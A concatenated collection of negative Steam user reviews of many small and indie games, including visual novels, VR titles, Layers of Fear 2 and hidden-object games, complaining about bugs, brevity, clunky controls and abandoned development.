Too short to be called a storyWell, that pretty much sums up everything. The visual novel looked promising so I picked it up during a sale; little did I know I would be done in an hour with this story...First things first, I won't recommend it. I did like the characters and character art but that's pretty much it. The story is extraordinary shallow. It seems like character development took a vacation together with reason on the same weekend: there isn't anything to develop in such a short time and any romance option is completely awkward. I decided to spend a day with Yuri and all I could do was randomly kiss her at a certain point. That just boggles my mind!Those "more than 25.000 words" consist mostly of idle chatter about what the characters are doing and what their relationships have been (aaand that impressive menu at the restaurant). Any progression is painfully absent. I don't know what I've missed from the previous novel, but I'm glad I didn't buy it. I'm so disappointed with this game. :(
Right now the game is not worth the money and that's because the camera movement is awful, you can't draw land like in the  trailer and the game didn't stop putting labels everywhere even tho I've turned it of.
Watch the videos and you'll know what to expect. It's not worth your money.
The girls spend more time in the hospital than they do recording and singing. It's an insane amount of micromanagement to keep them happy and healthy.One big cause of problems is salary. Their demands change minute to minute because every time a girl gains a little bit of fame (roughly from performing any action), they want a raise. They won't tell you this straight away and often, before they do, they've already fallen into a deep depression about being underpaid which makes them useless and costs a fortune to treat. So on top of all of your other micromanagement, you need to worry about mechanics like that which contribute nothing to the game, aren't readily apparent, and need manually adjusting every couple of minutes.There are autoschedulers but they are clunky and often won't apply since you need girls to be doing the same things at the same time, or pull them away for jobs and recordings.You can leave the girls to use their own discretion about things like rest and training, but their discretion sucks and they will often work themselves into a depression because they won't rest themselves.The micromanagement is very heavy even for a couple of idols, like I had. Now keep in mind you'll have 7 once the game gets going and I believe you can have up to 18.I'm salty because this game looked like it was right up my alley, but it's just not well implemented and fell flat.
a little dissapointing the character can't run
I was super excited to find this game because Venture Africa was one of my fave games growing up, and I didn't even know this one existed. Unfortunately, everytime I get to the part where the raven tells me to look around using the mouse or arrow keys, the game crashes and the wondow closes. It's a shame because what I've seen of the game is really good, but I don't know if I'll ever get to play....
I really wish I could recommend this game - the premise seemed very interesting, and the story has a lot going for it in terms of premise.But in terms of execution, it falls flat. The game itself is repetitive and dull and the presentation of the plot falls flat. I went into this expecting story, but the presentation and lack of exploration and/or gameplay really sank it for me.The idea of your actions affecting the storyline is interesting, and that concept does present some interesting persistent elements in the game, but overall it ends up feeling like an unfinished or poorly-executed mechanic (e.g. turning lights on to make the apartment feel more inviting ends up being a very boring farming-type process).I think the concept is excellent and the plot is intriguing, but there's not enough going in terms of gameplay and overall execution to make it worth the purchase.
The videos and attitude seemed like it would be cool. But after playing a few levels it was clear its just not my thing. Something just doesn't feel right about the core mechanic of how you rotate the blocks. It comes across as monotonous rather than interesting.
note: it's censored no sexual content
Disappointing rollercoaster with sharp, sudden turns that will trigger some feeling of motion sickness in even the most hardened VR user. The 4 tracks are not entertaining, with only the horror map providing a single events as the ride progresses and even that "spooky effect" happens over your shoulder causing you to have to look back awkwardly while trying to balance in your chair. There are also no options for changing the volume of the music or even for closing the application once you've finished. There are better free rollercoater rides out there - like AirCar which allows you to fly around freely.One other generic problem with VR controllers (I used the Oculus) is that the selection pointer follows the vertical direction of the handle instead of following the horizontal direction of the trigger facing - basically if you hold your controllers like a firearm it points upwards instead of forwards, meaning you have to angle your wrist downwards quite sharply to point straight ahead. While I recognise this is a common failure of most VR hardware design it's something developers need to understand and provide options to counteract.
 Reels of Fear Despite the number present right there in the title, Layers of Fear 2 is a completely separate story. The first game invited the player to a journey into a shattered mind of a painter as he attempted to create his masterpiece. A gradually revealed tragic background of the painter combined with increasingly disturbing choice of painting utensils, created a decent atmosphere, if not a particularly scary horror. For those who enjoyed the first game, I do have good news - Layers of Fear 2 is in essence more of the same. On that note, where the first game revolved around paintings, the second one tries to give a fresh spin on the formula by entering the world of films. This time around, the player gets to embody a persona of method actor abroad a luxurious liner – turned into extravagant film set. What follows is another venture into a broken psyche, filled with delightfully delirious visuals and mannequins. Lots and lots of mannequins. https://steamcommunity.com/sharedfiles/filedetails/?id=2389804512] Fool me twice Being what the developers called a “psychological horror”, both LoF games are in essence running simulators. The gameplay elements are kept to the minimum, this title instead relies on visuals and narrative to keep the player engaged. Such premise is not outright bad, however it places Layers of Fear 2 in a precarious position – you can’t tell the same story twice and expect it to make remotely similar impact. Admittedly, Layers of Fear 2 in some ways is an evolution of the ideas present in the first game. On the other hand, it shouldn’t surprise anyone that the innocent filming session quickly becomes a gateway into protagonist’s past. It also doesn’t take a huge leap of logic to deduce that character’s backstory wasn’t one filled with cuddles and puppies.Repetitive story aside, Layers of Fear 2 soundly delivers what is easily the strongest aspect of the series – abstract visuals. Bloober Team excels at creating visions of utter delirium. Instead of cursed paintings from the first game occasionally bleeding into reality, now the entire environment is warped. Repeatedly throughout the game, the player literally enters the film reel causing the colours to shift into black and white. On other times, there are dreamy sequences defined by blurry vision and oversaturated colours. Layers of Fear 2 keeps juggling the visual styles, throwing in multiple film references for a good measure. Given how many abstract scenes are in the game it’s often a stretch to give them meaning, nonetheless they look impressive. Tower of Babel Protagonist’s journey into the eerily empty cruise liner, populated exclusively by copious amounts of mannequins starts very strong. The game keeps shifting between fiction and reality in such a manner that while it’s obvious not all we see is real, some of it certainly is. The story quickly becomes introspective, yet it stays deliberately vague – do we truly explore the character’s past or is it merely a part of actor’s trade, building yet another character? All the while, the tension slowly rises with eerie encounters increasing in volume, along with appearance of misshapen monstrosity able to kill the player should it catch up. Contrary to the first game, you can die in Layers of Fear 2. Furthermore each part of the game presents the player with a character-defining choice, that will determine the ending. It’s a major improvement, as now the game has a better defined sense of urgency and clear rules regarding the finale, instead of “follow the internet guide with vague nonsense for single extra scene in the closing animation” that the first game did. Unfortunately, for all the curious build-up in the rough first half of the game it just drops the ball in the second one.https://steamcommunity.com/sharedfiles/filedetails/?id=2389804798]It’s high time to address why the second game is rated worse than its predecessor. Frankly, I cannot get into too many details as that would require covering the entire story, major spoilers included. Alas, take my word for it – Layers of Fear 2 feels like whoever wrote the script had an aneurysm mid-way and there weren’t any notes left for the unfortunate successor. At later stages, the game loses balance that built up tension in the opening acts. The title suddenly plunges entirely into fiction, while also essentially removing puzzles and monster presence. The film references become painfully overt and do not contribute to the story in any way, instead adding further confusion to already vague narrative. The developers seemingly discard all restraints, focusing exclusively on creating abstract scenery. In consequence, the story that used to drive the player forward by large falls apart at this point. Not a best conclusion for a narrative-driven title. Delusions of grandeur Despite being technically an evolution in almost every regard when compared to the first game, Layers of Fear 2 is ultimately rather disappointing. It’s a narrative-driven horror, which is not very scary and has a mediocre story. I daresay that the developers were trying too hard when pursuing the artistic angle, with the rest of this title ending up neglected in the process. This is probably where the game’s biggest crime stems from - especially at later stages, it becomes too abstract and creates a sense of detachment. As a result, the immersion breaks and any sense of fear or suspense disappears along with it. While at times undeniably creepy, Layers of Fear 2 simply fails to maintain the tension. To somewhat sweeten the deal, Layers of Fear 2 has a solid NG+ mode allowing the player to easily hunt for the achievements and explore alternative choices. While admittedly underwhelming as a whole, this title has undeniably impressive visuals. If you are a fan of the first LoF or are willing to play a game for the sights alone, you can probably give LoF 2 a chance, although I would recommend getting it on sale.
Broken Spell? Broken game!Purchased this game as the premise (a Chinese Action RPG with a supernatural bent) offered a different take on the genre and I wanted to support the indie development scene over there. Unfortunately, this game is hopelessly faulty, even after their supposed patch and bug fixes released earlier this year. A list of key things that DON'T work:* For an indie game, the voice overs were actually decent in the intro trailer and was one of the reasons I bought the game so I could follow the story. Unfortunately, there is NO VOICE OR SPEECH in the game (a bug which got introduced by their latest patch update it seems - why would an "update" remove a key feature from the existing game?! - go figure)* Hence you have to rely on reading the English translated subtitles which are... horrendous. The text is inconsistent, often incomprehensible and shows zero QA - e.g. in one sentence a guy is referred to as 'Stewart' and in the next sentence it becomes 'Stuart'* Saving function is broken - there is no manual save and there is NO indication when the game is auto-saving. As a rule, the game is auto-saved after every stage/boss encounter (as you would expect) but even this breaks down - I spent an hour clearing one stage and moving to the next one, only to have to restart the stage right from the start when I resumed the game.* Game-play mechanics are a complete shambles - almost every attack by the enemy stuns you for half a second, during which you can't do anything and can't run or roll away. So if you have two enemies that take turns attacking you, guess what? You are perpetually stunned while the enemies whittle your health away. There is no skill/finesse/planning at all, just a really woeful game-play design.* Best of all, you can't even reach some enemies - they get stuck in/on/within trees, tables, etc. and you have to goad them out of those objects they are stuck in before you can actually attack them, and this whole process is hit and miss. * The game is so bad it seems even the developer/publisher has given up on it - I tried to reach them three times via the game's forum on Steam, and four times via direct email, and ZERO response or acknowledgement. So I give up too.Avoid this game.
Cheap, simple, not actually that engaging. There are plenty of cheap little puzzle games like this on steam and a lot of them are actually fairly entertaining for the price. This one seems like it could be interesting but it's actually pretty dull. Unless you genuinely enjoy doing mental math, don't bother with this one.
Just as addictive as the first game, yet a step back in pretty much every other way.  Controls feel much more clunky than the first game with collisions and just moving around in general feeling off. Graphics are much uglier with a weird minecraft esque art style.  Menu's are hard to navigate. Etc.
It's a cute concept, but it's very short and has low production value. Rather than performing animated actions (besides walking and one or two other things), the character will just state "okay, I did this thing" without moving. Every time you open your inventory, you can't just click on an item to use it--you first have to remember to click the "Use" or "Look At" icons on the right side of the inventory, THEN click on the item you wanted, or else the inventory will just close itself when you click on an item. There are many spelling/grammar mistakes in the captions, which gets distracting, and adds to the low production value. Again, cute concept, and the music was fun, but I think it needs a lot more work.
can't get this game on full screen want my money back
I wish I could return this game and get my $3.50 back. I feel cheated because I did not at all get what was advertised. I watched the trailer and thought the game looked like a fun, relaxing color + music game, similar to audiosurf or something. What I did NOT understand from the trailer video is that this is an erotic edging game. You travel down a tunnel (it's a vag, lets face it), as strange music plays, while being given commands to go slowly and make "it" last as long as possible. The game gives you commands, like "buzz in me", "you on top" and "kiss me", among many other awkward things. Had I known this game was going to make me feel uncomfortable, like I was being coerced into leading a digital vag into a thinly veiled ecstasy, I NEVER EVER would've bought it. I bet some crusty nerds will think this game is super sexy, but as a woman I just feel used and confused by it. If you want to make a porn game, just make one. Don't mis-advertise it as some cutesy indie game and then cause your players to feel violated.
I cant really recommendthis as I didnt even get to play game. The whole menu system is broken and you have to keep retrying to select an option.So i eventually managed to select basement, lane and new game. Except no ball appeared so couldnt even play.The orientation is also flawed in that the flexibilty as to where your bowling lane appears is kind of fixed. so you could be bowling along the width of you space rather than the lenght, Will have been useful to be able to rotate the lane to face where you will be looking . sadly i will be refunding this but looks like its got potential.
In the beginning it was fun and pretty easy, but it got very soon very hard. Its pretty difficult to get certain things and it gets  boring to run after it without reaching it. I know this situation from other similar games in the very end when everything is finished and done and they give you an endless task to keep you playing, but not after the first few hours. I know they want you to buy stuff and thats what you need to do to still have fun.Dont be confused about my time counter. I left the game on between short play sessions to harvest energy.
Clearly I should have read other reviews/discussion on this game. Because there is no happy ending at all. All four of them are depressing, and the four endings are all you get. For a game that's twenty bucks (or even the fifteen it's on sale for now), it's short, has too few endings, and the mini-games are completely pointless, you don't even have to play them.I've never been so massively disappointed with a game, and I sorely regret wasting the money
I was intrigued about this game after reading an article about it. I feel a certain attraction to discover what this video game medium is capable of. However, I'm not entirely sure if games* like these can be easily categorised as recommended or not recommended.You have the topic to look into, how the story unfolds, the game's mechanic(s), but more importantly how it would work all together. Or not. And the sales pitch.... Because there's a price tag to it (which, fair enough, there's work put into it, but you're selling me your pain right now...).In this case it's fine, if we look at it as a Visual Novel game. But there's something about how the "story" unfolds... That feels like a police statement, or someone that tries to convince me of something. I honestly don't like the fact that between those in-game choices lies what the dev really chose to do and what the player would choose, blurring the line of what happened and what didn't.With that said, the game opens with a dedication to the son. It feels uncomfortable to be part of all this. I can only assume the kid is still very young and all this is still very recent... I don't know, it feels like a bad timing, to release this out in the public eye. After that, the store page acts like the back of the box where it has the bullet points of what makes this good/better than, which again, in this case leaves a sour taste to go on about "high replay value"... There's something very odd about that point and the topic.
This game has potential to become something better in the future, however currently the game isn't nearly as challenging as it should be and isn't very complex at all. The games units are all of the place as well, with the infantry being Roman foot soldiers and for some reason containing very futuristic tanks and bombers and it is not very balanced. The game is lacking in content and is nowhere near worth the $10 price tag currently on it, $5 would be a lot more reasonable for the current state of the game. Like I said earlier, this game has potential, but for now I'm getting a refund, but will check periodically on the game to see how its improved.
The controls are clunky, sound is aweful... not something worth getting.
Very clearly a game that was made in a few hours. It is very reminiscent of something I would have programmed myself over an afternoon in middle school. I do like the gameplay, though: it's simple and relaxed. However there are some things that were clearly overlooked. Namely: there is no way to quit the game (other than force-quitting); also, the red circles randomly appear anywhere on the screen without warning. Thus, you could be playing normally and then suddenly explode due to a circle appearing directly on top of you. This factor of luck is not a desirable thing. In addition, the simple particle-based animations are a little sloppy, but whatever.That being said, the price is hard to argue with. I got it 30% off, so I'm not too upset about buying this. If the game got cleaned up a little it would be a fine game.If it looks like something you would enjoy, then go for it. It's cheap.
Bad optimizations. Literally got this for the achievement. Good for some mindless fun though the price is too steep for my recommendation. Suggest getting on sale.
The StoryKate has nightmares about the death of her mother when she was young, by a demon-like monster. Now she is an adult, and is seeing them again. It turns out that she has inherited the role of a Keeper, one of a group of catsuit-clad supermodels who fight the Dark Ones. As this is a HOG, she does it mostly by finding strange things to unlock chests and bags, and searching through peculiar piles of objects in search of miscellaneous unrelated items. A number of women throughout history were Keepers, Joan of Arc was one. So was Marilyn Monroe!The GameAnyway, the game has a clear dividing line between the first and second halves. The first is slightly more original, but the second is completely standard for the genre. It has make-a-potion-from-ingredients and make-a-thing-in-a-forge mini puzzles, just like almost every hidden object game ever. Graphics-wise it is fairly average. It has a couple of songs, which is unusual. The game is pretty easy, apart from a couple of points which can cause trouble.VerdictThe game is quite average in every way, but I am giving a thumbs-down because the second half is less interesting than the first and there are a few rough edges.
I typically love this kind of game but this one is ridiculously bad. The UX is terrible, there is no strategy to follow, you can sometimes leave the map with half the stuff on it, there is no real challenge to any level (except for the odd one where you need 2 stones to finish and there is no second one... and when you think you're gonna be stuck because the game has a major flaw, somehow one appears in your inventory while you didn't do anything?) Sometimes you can queue the next item, sometimes you can't and it's random. sometimes you can queue one, sometimes two... I have to gather some vials or diamonds that have nothing to do with the game objectives and idk what they're used for. The dialogs with the NPCs are impossible to navigate... the magician in the corner does nothing except block some items sometimes but i have so much time to complete the level it doesn't even matter...I want these games to be challenging, but in a good way, which this one certainly fails at!
Edit: I've tested the game after update #1 (2020-12-24) and I can confirm that all issues that I've mentioned before are still present in the game. The buggy mushroom jumping is probably even worse and the swing runs from Santa's feet exactly like before. Also the wooden platforms which were stable before are now rotating so the game was made harder without adding any lower difficulty mode (infinite respawns).The game is good but I can't recommend it in this state. There are numerous issues that I wouldn't expect from a brand new remaster of the original game, like:Glitches, buggy controls and poor game design choices:- In one level you can fall through a solid floor.- Jumping from some platforms is bugged (sometimes Santa just won't jump and fall to his death instead, the issue is most visibly present in a sloped platforms like those big mushrooms, for example).- In some levels you need to constantly fight the camera which is obscured by near objects that takes the whole screen (for example in the level with many "fans" in the last episode the whole view is very often obscured by a fan blades of a closer fan or a center pillar which forces you to walk/jump without seeing what is in front of you).- Santa is moving by himself on a platforms that are in motion (a big swing or a fan blade, for example).Bad level design elements:- Numerous beginner's traps or a level layout that abuses aforementioned camera issues that shouldn't be there in the first place.- Leaps of faith that can easily get you killed.- Sections with too many enemies combined with ice/rounded ground everywhere with no place to catch a breath or even get yourself oriented in the layout (where should you go, which enemies are there and what are their walking routines).- Troll hurling snowballs has purposefully deceiving attack animation so it looks like he is aiming at a place where he started his attack but the snowball magically flies right at you like a homing missile.A missing features that should definitely be in a remaster of an old game:- Game mode with an infinite lives. There is no reason to not have an optional game mode with an infinite checkpoint respawns. Game shouldn't be designed in a way that you need to constantly replay a whole level from the beginning after a few deaths. That's just an obsolete game design element. And this is not only frustrating (and sometimes even infuriating) but it takes away part of the fun from the gameplay in many levels. This is most obvious in the last episode which contains quite large and non-linear levels which would be fun to explore at your own leisure but the game design highly discourages this. Because with exploring you risk losing those few lives that you have which would force you to play the level all over again and again and again. This could be easily fixed just by adding a difficulty setting (for example "normal" and "relaxed").- You should be able to left the game and continue where you left off next time you start it. There is no save system, if you want a high score you need to play the whole game in one sitting. If you just care about finishing the levels and not the score, you have an option to quit at the beginning of an episode and continue from a new game starting from that episode but that means that you always have to finish all four levels in an episode to quit the game otherwise you would have to replay levels you have already finished.- More modern control scheme. The scheme in this game is quite bad/outdated. There should be more options to control the game. I'm all for retaining the original controls for those players who likes them but there should be an option in settings to switch to a more modern control scheme. Like for example standard 3rd person controls (left analog for movement and right for rotating the camera). This old scheme just makes the game artificially more difficult (you can fall from a platform when you just want to look around and accidentally move the analog forward/backward and you can't look up or down to see where you are going or should be going).
Lied about multi-player. There is no multi-player. Dice are slow. Forced music, no option to turn off the music. Dice fall on top of each other a lot, and it forces you to re-roll, dragging the game out. I don't like giving negative reviews, but this was tedious and the description is misleading.
I changed my mind it has not got more maps and story.
First review:I will be honest, this game is just like a mobile game, a clone in fact. The sound effects they have are pretty annoying, and the sound when you click the mouse sounds like some hocking a spit wad up. The map is super hard to navigate, and I got lost even though they give a map.  If you like childish, boring, and repetitive mobile games, then this one is for you, I guess. No need to get this unless you want to waste 3 dollars on a game that should be FREE.
yucky game play!
Sorry, but this game isn't good. It has a lot of remote controlled vehicles, but it just isn't fun. (unlike the name suggests) This game is just.... boring. You have all of the vehicles from the start, which you'd think would be good, but it just means that you just teleport to where you get the car, boat, rocket, plane, or helicopter, and you just use whichever one you want. You may have a lot of rc cars, but there's no customization if you like a specific one. The main areas are boring and bland. The city is practically dead, with no one else there unless you play a mini game. The places are often dark, to represent the fact that no one else it there. I wouldn't recommend it. Not even as a freeware game.
Lets start this review by just saying that this game is essentially the same as the first, all they did was slap a 2 on the end and call it a new game. I some how feel while i played this game that it belongs on my Facebook, and i keep expecting to sign into Facebook book and see my timeline spamed with Kingdom Tales 2 propaganda. If this game was made by anyone it was the North Koreans.. simply because they have no idea whats going on outside in the real world and live in 1999. Would i advise you to waste any amount of money on this game.. NO.. this game is for a 3 year child that is just entering the world of RTS games. Sometimes i wonder how steam allows crap like this on their system, its like getting robbed of your hard earned dollars for recycled crap.
0/10 worst game I've ever played and I got all achievements in the 9 minutes Steam registered play time. Should be a free game with the quality it gives you.
50% of achievement images are placeholders.
sticky paws is an alright game, but its held back by some pretty big factors that honestly make it not worth the purchase.prosgame feel, the movement in this game is top notch. i was talking to jonnil (the programmer) who said that the movement is the first thing that he works on, and it really shows.background art, pixpak, who did the background art, has some serious talent and it shows.voice acting, as a voice actor myself i can say that the voice acting in this game has some serious energy to it, nate and dusky have done great here.level 9, its the only level that really challenged me, and for a movement based game thats really important, luckily level 9 is an enjoyable experience through and through.level maker, it lets people make levels that actually challenge the player, what more could you want.consevery level other than level 9, none of the levels really feel like they push stickys abilities honestly. which is sad because this has alot of potential.every character design other then sticky and catlyn, the enemies and bosses are really uninspired. considering that we're working with rats here, they could be  way more interesting, but instead they are just squares.music, the tracks that arent the main theme are really dull, the soundtrack never seems to fit with the level, and its over all forgettable.the length, 9 levels is just not enough, if you have the demo you have 5 levels, which is over half the game. its up to you if its worth the money for 4 levels, 3 of which are subpar. TLDR. buy the game if you have the spare cash, but if your looking for a long experience that tests your abilities, look somewhere else.im interested in seeing what future projects come out of jonnil, and hopefully ones which are longer and more full with content.
Just a long, boring sequence of fetch quests where you walk back and forth through the same screens. As you progress, there's just more walking added because places get farther apart.
A very short VN where a Swedish PI takes on the case of a missing person.Fairly good story, but you only follow the story. You do not take any active part in the investigations, the choices you get seems rather to be about flirting with this woman or that.Not worth the money for only 2 hours "story reading".
game never plays! Installs fast but game will not open! Ive bought and refunded this game literally 5 times PLUS went out and got a new GAMING computer and game STILL doesn't work! DO NOT WASTE THE TIME OR THE MONEY ON THIS GAME!!!!
An easy 100% for those achievement hunters out there, extremely repetitive game with no skill required to play. Even at its low price I would only get this game at a discount. Nice idea and not bad pixel graphics though, would be nice if it was a little more challenging.
Didn't do anything for me :(
I let the game open overnight so I cant refund it, but this game is worth like 2 bucks top, anything more expensive isnt worth it.You finish the game once (around an hour) and then you're done, no replay value.Unless they update it, I cant recommend this game, it's like throwing cash away.
An unfortunate find...I got this game because I thought it would be fun to play it with my chat on twitch stream. WARNING: DEVS HAVE STOPPED TO CARE ABOUT THIS GAME. It has not been updated for a few years now. It does not connect to twitch no more, or YouTube. The methodology behind it is niche and creative, but I just wish someone cared about it to update it periodically. I do not recommend this to anyone to it gets an update.
started a good game. Then notice that its timed. never got past 1 star i hate timed games...
The low price is not worth the few minutes of mild entertainment it provides. This game feels like a beta.
Can't quite believe I just paid £15 for this. I expected a lot more game for my money. There is a fixed number of turns per level, and three choices to make per turn, and ultimately one path through history you can take, and when you've done that it's done. I get that it's in early access, but there needs to be a lot more content before the game is worth even the discounted price.I like the basic premise, I think the trading aspect needs improving - just make the prices fluctuate, that's all you need to do. Hey here's a thought, given that the game encourages you to start branches in London, Bruges, wherever (which you will inevitably close when they lose money), why not make the market prices different in different cities.Not enough things to do, not enough ways to influence the progress of the game. the foreign branches make money, then they lose money and you close them and that's what happens. Sometimes you have to pay money to answer a question on Renaissance art; these are considerably beyond general knowledge level, I'd say at the least you've spent a term on the Renaissance in high school to get these, or alternatively, you're using google image search. If you answer these questions right (which you will do if you're using google), you will easily max out your reputation and soul (essentially your standing in Florence and the church.You occasionally have to decide whether the price from a merchant in a popup is higher than the one on the market, which stays the same without changing the whole game. And two of the three commodities have the same prices.You occasionally have to decide which city or political faction to support. It's not hard. I really wanted to like this game, I like the idea, but there's nowhere near enough to it. It's nice enough, but it's over far too quickly. As things stand it would justify a price of £2-3 at most, although even then, there's much bigger games you can get for £2-3.
Not sure how good the puzzles are, didn't get that far.Rather bad motion sickness warning!I've spent more than a fair number of hours in Elite Dangerous and Lone Echo with absolutely no issues. However, within minutes of loading this up, I broke out in a cold sweat. There's something just off about the motion.There is not teleportation movement, corner dimming or any of the other anti sickness measures. It's all smooth translation. Move and strafe with left touch stick, rotate with right. On top of that, there is an up and down translation on the buttons.If there are options to change this, I couldn't find them. Not using Rift Touch controllers anyway.The game also put me way too high, so the scale just felt off.Avoid for now.
Good concept. Poor executuion. Reminds me of a game I played as a kid - Balance. Although I like this type of game, the gameplay it's really no big deal. The "puzzles" are easy, the game has issues with the graphics, one second I'm running it at 90fps, the other it drops down to 10fps ?!? Might be a problem with my pc, but I play most of the games on atleast 30fps with no issues.There's nothing that a good patch would probably fix but there's no support for the game. If you wanna try a good game with a good challenge, just find Balance and play that instead.
The worst game ever. I had to pay 5 dollars for this crap. if it was free I would not complain. but it sucks. i tried to draw and it just was a big mess. DON'T BUY OR YOU WILL BE UNSATISFIED.
Now, I'm a big fan of these hidden object adventure games, and I can safely say that there are some amazing ones out there. Sadly, "Crystals of Time" is not one of them. First of all, the game pretty much leaves you to your own devices for the most part. It's hard to tell which rooms you're supposed to go to next; I kept having to press the hint button to figure out where I was supposed to go. Not only that, you can't easy-jump from room to room using the map; it only leads to certain general areas of the house, the garden, etc. As a result, there's a lot of backtracking involved, and it quickly gets annoying.Second, the so-called story in this game really has no bearing when you actually start playing. First of all, why does a thief need to break into an abandoned mansion? And those "crystals of time" that are supposed to be super-important? Yeah, you spend most of the game looking for the crystals, but actual time traveling literally only happens in three rooms of the game. Nowhere else! This results in the ending being one of the most anticlimactic I have ever seen. We're introduced to all these characters and pieces of a story, but they don't seem to completely fit together.As for the puzzles themselves, they're fine. I was pretty much able to figure them all out without any difficulty. But if you like a good story to go with your hidden-object adventure games, I do not recommend this one. At least, not unless you like sitting for thirty seconds waiting for the hint button to recharge.
I love hidden object games but I do NOT recommend this game if u want to have to leave the game every 10 minutes or so because it hurts ur eyes so much and gives u an instant heacache. I have the latest ATI graphic card drivers v13.1.1 and it is still completely grainy
has boxplosions, is boring, box/explosion wouldn't eat colours
this game is broken and is practically unplayable. When trying to build, there is no way to rotate the camera and is left facing this one angle.
There may be a game behind this bug ridden thing but because I can barely get this to work and judging by the history of this publisher I doubt any fixes are coming. It sucks because I'm interested in new Tower Defense games and I would LIKE to play this but I kid you not there is NO menu at all to learn the game, change any visual or gameplay options, and the audio options don't even work. You have little information on what turrets do, or the differences between waves/minions. Even for 1.99 I can't justify this game, for 20 dollars I'd be livid.
I mean..... You get like 40 minutes to spend your money to house animals and then nothing slowly (it's agonizing) wait for people to come in.There's no tutorials at all..... Just gotta kinda fumble around while your animals slowly die as you struggle to find out how to feed them.Mistakes were made this day.
stupid and doesn't work. Nancy's engine won't work.
This game has decent graphinc, but its missing, 1) a tutorial, 2) ITS A DLC!!!!! thats all
Bought this as an educational tool for my child who is homeschooling because of covid.  VERY VERY Basic stuff.  Not impressed, doesn't seem accurate at all.  Babylon not included.   I'm going to return it if I can, along with the rest of the bundle.
0/10 this one is actually pretty stupid, only buy if on sale for 101% off.
There is no way to know if you save at a point that always result in a bad ending, I have to watch a walk-through to know I do not have the stat to pass.
Combining a SHMUP with idle game it' s not a bad idea, unfortunately, this games implements it badly, especially for those using mouse and keybord. The shooting part seems like something that was tacked in at the last minute, with awfull controls, no option for customizing graphics, no option to lock the mouse to the window, wich causes problems for anyone with dual monitors, a complete disaster.If they fix some of those issues, I might rewrite this and change my recomendation. But for now, I uninstalled it and recomend that you don' t waste your time. There are better SHMUPs for chean and idlers for free out there.
Terrible game, basically unplayable and frankly not even worth the "early access". The controls arent explained in the game, the vehicles run/drive like total ♥♥♥♥♥ and basically impossible to even win the first lowest level race because the car hardly accelerates....Great idea for a game..horribly executed...
DOES NOT WORK WITH XBOX ONE WIRELESS CONTROLLER. Charecter Moves Left constantly. know issue with Unity games and Wireless Xbox one controllers
Funny and challenging game but unfortunately it's unplayable because of the lags.Apparently nothing will fix it.I would play but I can't
The game runs all right after tweaking (black screen if run full screen for me). Whatever you do, do NOT hit 'esc': there's no dialog box, so the game closes to desktop no matter what you're doing. Local multiplayer crashes about half the time, and online multiplayer sits waiting to connect...then exits to desktop.It...looks nice? There's a positive. The rules are consistent, and the AI doesn't seem to cheat. The control sceme is fiddly with my mouse, even turned way down. Don't know about anyone else.Acheivements aren't a priority for me, but it'd be nice if they *worked*. As anyone can see from the forums and other reviews, the developer just doesn't care. If you plan to buy the game, only get it super cheap (say, 50 cents or less) and and don't expect achievements.
I tend to dislike writing reviews, but I feel it's warranted here because I was really looking forward to this VN ever since it was announced a few years ago and I think the game really needs the feedback.This game SERIOUSLY needs more playtesting. A lot more. Not because of bugs; I ran into a few interface bugs here and there, but nothing that was crippling. What really cripples this game is that this game's expectation of the player's logic is nonsense. Puzzles are often without hints and, if they do have hints, they're extremely vague or confusing. The incinerator section in Chapter 2 is a great example; out of the 6-7 puzzles in that section, only ONE of them has anywhere close to a reasonable hint (the Hit-Miss number section). Out of the remaining puzzles, 2 of them have no hints whatsoever, 1 of them is semi-random whether the hint you got will work or not, 1 of them requires knowledge of Hebrew (?!), and some of them are just plain incorrect (like 666 and 616 being numbers of significance or the word alignment puzzle).And this goes for the user interface too. There's a reason why most adventure games nowadays have the ability to highlight objects of note or choose where to move out of a list and not just click on the background randomly. Where you choose to go when changing locations is extremely unclear and often very finicky; the incinerator section is again, a great choice because at the hallway, you have to move your mouse left to go right to the bust room, or else you go forward into the incinerator room itself. Let alone non-puzzle sections where it's totally unclear where you are and aren't allowed to go to move the story forward. And sections where you have to find objects to add to your inventory? It's so easy to click things in a random order and not know what to do.It's a shame because the story is interesting and there's a lot more work into the animation and voice delivery than you see a lot of other VNs do, but this game really needs a lot more work before you can do a blind playthrough of it whatsoever. I'll still complete it, but it'll be with the help of a video guide, which kind of defeats the point of adding puzzles to a VN.
**ABANDONED BY DEVELOPERS**I liked this game a lot when my friend and I got it, but I feel like I need to put a modern review out there to let people know the state of the game.It is fun, it's got good music and really cool concepts, and the various play-styles brought by the characters are a lot of fun. HOWEVER, the content is slightly lacking, and more importantly, there are still many known bugs in-game, and it has been utterly abandoned. Sometime mid-development, the devs just packed up without warning, and announced their new game. Many of the bugs that my friend and I have found are utterly game-breaking. Most of the time, we can't even play together because if either of us dies, that doesn't register for the other player and it becomes impossible to progress. TLDR: While the can be fun, there are a lot of know game-breaking bugs, and the devs still abandoned for a new project.
Fruits Inc. looked like a nice casual game which i need from time to time but i was a bit disapointed.At first i tried Fruits Inc. 2 only to find it was made for a mobile platform. A lot of the art had to be stretched to fit a normal screen so it was quite pixalated.It's also unexpectedly laggy, you'd think it would run smoothly since it looked like it would run fine on a 10 year old computer, this would get a lot worse when you have something selected and you can move it around without holding the mouse botton down unlike a touch screen, at that point the game slows down below 2 FPS.Then i tried Fruits Inc. 1 and found it much better. Everything was much more responsive. I thought i could recommend it until i found out the game is broken and you can't buy resources which are needed past level 5.Both games would actually be fun to play, both are short and not much in terms of story but interesting enough to play, the sequel is still playable although both would need to be fixed, but until then because of the reasons above i can't recommend them, not even on a sale.
How to get refund?
I'm a little bit dissapointed. This game looks and sounds really great but that's it.(So far) There is no lore, no story being told and nothing else to explore.You just fly from A to B, destroy some asteroids and move on to the next planet.You'll finish the game before maxing the weapon upgrades and the money you get for crafting items is only being used for 4 other ship-models, each available for $50. I finished the game with 300k wihout anything to spend on. If that's what you're looking for and if you're willing to pay about € 16,- for 3 hours of gameplay go on and take it, otherwise I would not recommend to buy it.
This game appears to be attempting to be relaxing; yet it does not succeed in this, in my opion.  There is considerable focus on scoring, and as the seasons progress your score becomes much more dependant on luck than skill.  It gets increasingly frustrating, as you are denied the three-star score for either failing to use one of each colour and shape to fill the grid, or for getting stuck at any point.  This would be tolerable if it were actually always possible to 'win'.  It is not - you can fill the grid without ever being offered a shape / colour that you need.  The massive ramp up in probability of failure in Winter is especially frustrating.This game feels at odds with itself.  If it wishes to be relaxing, it should drop the score and the achievements (and put something in their place, as the game feels a little empty as it is).  If it wants to be a puzzle game, it should eliminate the luck component.
